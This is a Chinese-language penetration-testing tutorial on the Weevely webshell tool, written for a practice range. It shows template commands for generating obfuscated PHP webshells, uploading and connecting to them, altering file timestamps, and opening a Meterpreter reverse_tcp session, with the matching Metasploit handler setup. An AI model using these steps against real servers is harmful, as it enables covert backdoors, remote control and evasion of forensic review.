Weevely
weevely是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。
一、Weevely下载与安装
下载地址:https://github.com/epinna/weevely3
下载之后解压,使用里面的weevely.py
在kali中国
二、WebShell—简介
“web”的含义是显然需要服务器开放web服务
“shell”的含义是取得对服务器某种程度上操作权限
站长:
网站管理、服务器管理、管理数据库等
入侵者:
后门程序、控制服务器、达到目的等
简称:后门,入侵者为了达到目的以及作为控制对方的后门文件
大马小马一句话?
1、小马
文件体积较小、上传文件、文件修改、文件管理
2、大马(不推荐)
文件体积较大、功能齐全、能够提权、操作数据库等
3、一句话木马(主流)
短小精悍、功能强大、隐蔽性好、客户端直接管理
三、Weevely—简介
WebShell 管理工具(一句话木马)
Weevely 是一款使用 python 编写的 webshell 工具,集webshell生成和连接于一身,采用c/s模式构建,可以算作是linux下的一款php菜刀替代工具,具有很好的隐蔽性。
在 linux 上使用时还是很好的,集服务器错误配置审计,后门放置,暴力破解,文件管理,资源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等功能。
其他 WebShell 管理工具(扩展)
- 中国菜刀
- C刀
- 中国蚁剑
- 冰蝎
- XISE
WebShell管理工具是渗透人员常用的连接工具
四、Weevely—使用
1、生成 shell
命令如下:
weevely generate <password> <文件名>
2、连接 shell
命令如下:
weevely <URL> <password> [cmd]
3、生成混淆 shell
命令如下:
weevely generate -obfuscator cleartext1_php <password> <文件名>
五、靶场实战
weevely 生成 webshell 文件名xx.php,密码:xxx来到之前sqlmap的--os-shell命令生成的文件上传目录后我们把生成的xx.php文件上传上去,再使用weevely + url + 密码 连接
六、Weevely—模块
weevely 模块使用
1、信息收集
:system_info 收集系统信息
:system_info - info client_ip 查找自己连接IP
2、文件管理
:file_touch 修改文件时间
:file_touch - human-ts ‘2018-09-15 20:41:20’ 文件名
3、命令执行
:shell_php 执行PHP命令
:shell_php system(‘ipconfig’);
4、生成 meterpreter 会话
:backdoor_meterpreter -payload php/meterpreter/reverse_tcp -lhost 本机IP -port 端口号
5、MSF 设置
use exploit multi/handler
show payloads
set payload php/meterpreter/reverse_tcp
show options
set lhost 本机IP
run
通过转发我们可以在MSF中操作我们的shell